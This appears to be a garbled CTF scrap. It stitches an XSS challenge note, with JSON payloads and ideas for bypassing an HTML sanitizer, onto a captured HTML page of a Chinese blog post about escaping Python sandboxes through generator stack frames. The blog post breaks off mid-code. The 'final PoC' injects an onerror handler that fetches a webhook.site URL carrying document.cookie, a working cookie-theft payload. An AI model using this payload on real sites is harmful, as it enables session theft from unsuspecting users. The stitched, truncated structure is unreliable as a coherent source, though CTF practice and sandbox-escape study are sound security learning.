            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>
>"}

{"content":"\" onerror=alert(1)>\"","layoutId":3}

最终 poc

{"content":"\" onerror=fetch('https://webhook.site/f57e3466-a8a4-4a5c-968a-551c1543af38?flag='+document.cookie)>\"","layoutId":2}

safe layout

思路：

将 ALLOWED_ATTR 完全置空。需要找到没有 attr 的构造方式，或者结合正则替换绕过？
类似 gitlab issue 中结合其他 js 的用法，例如 ujs，但貌似页面没有加载其他 js。
1. data-b aria-c 仍旧是可用的 <div a="a" data-b="b" aria-c="c">
2. Prevent CSP bypass that use Rails' ujs data links (#336138) · Issues · GitLab.org / GitLab · GitLab
CSS 注入？Flag 在 cookie 中而不是页面
CSRF？没有 CSP 防护，form 标签可以进行 CSRF，但 CSRF 应该也无法访问 cookie

  
{"layout":"x<style><<!doctype html>

<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="light">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta property="og:locale" content="en" />
<meta name="description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<meta property="og:description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<link rel="canonical" href="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:url" content="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:site_name" content="DummyKitty’s Blog" />
<meta property="og:image" content="/assets/images/pyjail.jpg" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-11-09T14:23:57+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/images/pyjail.jpg" />
<meta property="twitter:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta name="twitter:site" content="@DummyKitty" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-04-02T00:46:04+00:00","datePublished":"2024-11-09T14:23:57+00:00","description":"pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈","headline":"pyjail bypass-11 利用生成器栈逃逸","image":"/assets/images/pyjail.jpg","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"},"url":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"}</script>
<!-- End Jekyll SEO tag -->

  <title>pyjail bypass-11 利用生成器栈逃逸 | DummyKitty's Blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->

<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="DummyKitty's Blog">
<meta name="application-name" content="DummyKitty's Blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">

  <!-- Resource Hints -->
  
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
  <!-- Bootstrap -->
  
  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  
  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->

<!-- layout specified -->

    <!-- image lazy-loading & popup & clipboard -->
    
  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>

<script defer src="/assets/js/dist/post.min.js"></script>

<!-- Pageviews -->

    <!-- PWA -->
    
      <script
        defer
        src="/app.min.js?baseurl=&register=true"
      ></script>
    
    <!-- Web Analytics -->
    
  <!-- A placeholder to allow defining custom metadata -->

</head>

  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/images/me.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">DummyKitty's Blog</a>
    <p class="site-subtitle fst-italic mb-0">Code Audit@xxx / Penetration Tester@xxx / CTFer</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            
            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            
            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            
            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            
            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
        <a
          href="https://github.com/DummyKitty"
          aria-label="github"
          
            target="_blank"
            
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
        <a
          href="/feed.xml"
          aria-label="rss"
          
        >
          <i class="fas fa-rss"></i>
        </a>
      
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->

    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      
            <span>
              <a href="/">Home</a>
            </span>

              <span>pyjail bypass-11 利用生成器栈逃逸</span>
            
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->

<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->

<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->

<!-- Change the icon of checkbox -->

<!-- Handle images -->

    <!-- take out classes -->
    
    <!-- lazy-load images -->
    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      
        <!-- create the image wrapper -->
        
    <!-- combine -->
    
<!-- Add header for code snippets -->

<!-- Create heading anchors -->

<!-- return -->

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>pyjail bypass-11 利用生成器栈逃逸</h1>
    
    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1731162237"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Nov  9, 2024
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1743554764"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Apr  2, 2025
</time>

        </span>
      
        <div class="mt-3 mb-3">
          <a href="/assets/images/pyjail.jpg" class="popup img-link preview-img shimmer"><img src="/assets/images/pyjail.jpg"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      
      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          
          By

          <em>
            
              <a href="https://twitter.com/DummyKitty">DummyKitty</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          
          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->

<!-- words per minute -->

<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2817 words"
>
  <em>15 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">pyjail bypass-11 利用生成器栈逃逸</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">pyjail bypass-11 利用生成器栈逃逸</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  
  <div class="content">
    <blockquote>
  <ul>
    <li><a href="/posts/python-沙箱逃逸原理/">pyjail 沙箱逃逸原理</a></li>
    <li><a href="/posts/pyjail-bypass-01-绕过删除模块或方法/">绕过删除模块或方法</a></li>
    <li><a href="/posts/pyjail-bypass-02-字符串变换绕过/">绕过基于字符串匹配的过滤</a></li>
    <li><a href="/posts/pyjail-bypass-03-绕过命名空间限制/">绕过命名空间限制</a></li>
    <li><a href="/posts/pyjail-bypass-05-绕过长度限制/">绕过多行限制</a></li>
    <li><a href="/posts/pyjail-bypass-04-绕过多行限制/">绕过长度限制</a></li>
    <li><a href="/posts/pyjail-bypass-06-变量覆盖与函数篡改/">变量覆盖与函数篡改</a></li>
    <li><a href="/posts/pyjail-bypass-07-绕过-audit-hook/">绕过 audit hook</a></li>
    <li><a href="/posts/pyjail-bypass-08-绕过-AST-沙箱/">绕过 AST 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-09-绕过输出限制/">绕过输出限制</a></li>
    <li><a href="/posts/pyjail-bypass-10-绕过-opcode-沙箱/">绕过 opcode 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-11-利用生成器栈/">利用生成器栈</a></li>
  </ul>
</blockquote>

<p>本文仅作为个人学习记录，大部分参考自下面的文章，讲解得非常细致：</p>
<ul>
  <li><a href="https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern">利用生成器栈帧逃逸 Pyjail - CISCN 2024 mossfern 题解</a></li>
</ul>

<h2 id="利用生成器栈帧进行逃逸"><span class="me-2">利用生成器栈帧进行逃逸</span><a href="#利用生成器栈帧进行逃逸" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="生成器"><span class="me-2">生成器</span><a href="#生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>在 Python 中，生成器（Generator）是一种特殊的迭代器，它能够逐个生成值，而不需要一次性将所有值存储在内存中。生成器的主要特点是它们能够 惰性计算，即按需生成数据，这使得它们在处理大量数据或无限序列时非常高效。</p>

<p>生成器通过使用 yield 关键字来返回值，而不是像普通函数那样使用 return。当一个函数包含 yield 时，它就成为了一个生成器函数。调用这个函数不会立即执行，而是返回一个生成器对象。每次调用生成器对象的 next() 方法时，函数会从上次暂停的地方继续执行，直到再次遇到 yield 或结束。</p>
<h4 id="创建生成器"><span class="me-2">创建生成器</span><a href="#创建生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>创建生成器有以下两种方法：</p>
<ol>
  <li>使用 yield 关键字
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre> <span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
     <span class="k">yield</span> <span class="mi">1</span>
     <span class="k">yield</span> <span class="mi">2</span>
     <span class="k">yield</span> <span class="mi">3</span>

 <span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span> <span class="c1"># &lt;class 'generator'&gt;
</span> <span class="nf">print</span><span class="p">(</span><span class="n">gen</span><span class="p">)</span>       <span class="c1"># &lt;generator object my_generator at 0x7f4a20e049e0&gt;
</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span></pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>使用生成器表达式。类似于列表推导式，但使用小括号 () 而不是方括号 [] 来创建生成器表达式。
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre> <span class="n">gen_exp</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">*</span> <span class="n">x</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">5</span><span class="p">))</span>

 <span class="k">for</span> <span class="n">num</span> <span class="ow">in</span> <span class="n">gen_exp</span><span class="p">:</span>
     <span class="nf">print</span><span class="p">(</span><span class="n">num</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div>    </div>
    <h4 id="生成器转化为列表"><span class="me-2">生成器转化为列表</span><a href="#生成器转化为列表" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
    <p>生成器转换为列表可以使用如下的几种方式：</p>
  </li>
  <li>list 构造函数</li>
  <li>列表推导式</li>
  <li><code class="language-plaintext highlighter-rouge">*</code> 解包操作符
```py
gen = (x for x in range(5))<br />
lst = list(gen)</li>
</ol>

<p>gen = (x for x in range(5))<br />
lst = [x for x in gen]</p>

<p>gen = (x for x in range(5))<br />
lst = [*gen]</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>

### 栈帧
在 Python 中，栈帧（Stack Frame）是每次函数调用时创建的执行上下文。每个栈帧包含了函数的局部变量、参数、返回地址等信息，并且这些栈帧按照调用顺序被压入 调用栈（Call Stack）中。

#### 获取栈帧
获取栈帧的基本方法是使用 sys._getframe 方法：
```py
import sys
f1 = sys._getframe()
print(f1)
# &lt;frame at 0x7fb8d49984a0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack.py', line 3, code &lt;module&gt;&gt;
print(type(f1)) # &lt;class 'frame'&gt;
</pre></td></tr></tbody></table></code></div></div>
<p>f1 就是一个栈帧对象。</p>

<p>另一种方法是用 inspect 库的 currentframe 方法</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">inspect</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="nf">currentframe</span><span class="p">()</span>
</pre></td></tr></tbody></table></code></div></div>
<h4 id="交互式命令行的差异"><span class="me-2">交互式命令行的差异</span><a href="#交互式命令行的差异" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>注意，由于 Python 交互式命令行在执行代码时会使用单独的栈帧，因此下面的代码在交互式命令行与脚本文件中执行的结果不同。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="o">&gt;&gt;&gt;</span> <span class="kn">import</span> <span class="n">sys</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span>
<span class="bp">False</span>
</pre></td></tr></tbody></table></code></div></div>
<p>直接执行脚本文件时返回 True</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">f1</span><span class="p">))</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span><span class="p">)</span> <span class="c1"># True
</span></pre></td></tr></tbody></table></code></div></div>
<h4 id="栈帧工作原理"><span class="me-2">栈帧工作原理</span><a href="#栈帧工作原理" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>栈帧的工作原理如下：</p>
<ol>
  <li>当程序开始执行时，会创建一个==全局帧（global frame）==，它是整个程序的顶层上下文。</li>
  <li>每当==调用一个函数时，Python 会创建一个新的栈帧，并将其压入调用栈顶部==。</li>
  <li>==当函数完成执行后，当前栈帧会被弹出，并将控制权返回给上一个栈帧==。</li>
  <li>这种过程持续进行，直到所有函数都执行完毕，最终回到全局帧。</li>
</ol>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">global frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">add() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">multiply() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># global frame: &lt;frame at 0x7f5793d5a400, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 3, code &lt;module&gt;&gt;
# multiply() frame: &lt;frame at 0x7f5793d35480, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 11, code multiply&gt;
# add() frame: &lt;frame at 0x7f5793d34940, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 6, code add&gt;
</span></pre></td></tr></tbody></table></code></div></div>

<h4 id="栈帧的内容"><span class="me-2">栈帧的内容</span><a href="#栈帧的内容" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>使用 dir 查看栈帧的内容：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre><span class="nf">dir</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__delattr__',
#  '__dir__',
#  '__doc__',
#  '__eq__',
#  '__format__',
#  '__subclasshook__',
#  ...
#  'clear',
#  'f_back',
#  'f_builtins',
#  'f_code',
#  'f_globals',
#  'f_lasti',
#  'f_lineno',
#  'f_locals',
#  'f_trace',
#  'f_trace_lines',
#  'f_trace_opcodes']
</span></pre></td></tr></tbody></table></code></div></div>
<p>除了 Object 共有的属性之外，有一些 f_ 开头的属性是栈帧对象独有的。</p>
<ul>
  <li>f_back：它是指向上一个栈帧的指针。在 Python 中，f1.f_back 拿到的也是一个栈帧对象。</li>
  <li>f_builtins、f_globals、f_locals：对应着当前栈帧的 builtins、globals、locals 对象。</li>
</ul>

<p>我们可以使用前面的脚本进行测试：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">global_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="n">multiply_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="n">add_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="c1"># print(f"global frame: {global_frame}")
</span><span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">add_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"add() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">multiply_frame</span> <span class="o">==</span> <span class="n">add_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">multiply_frame</span>
    <span class="n">multiply_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"multiply() frame: {frame}")
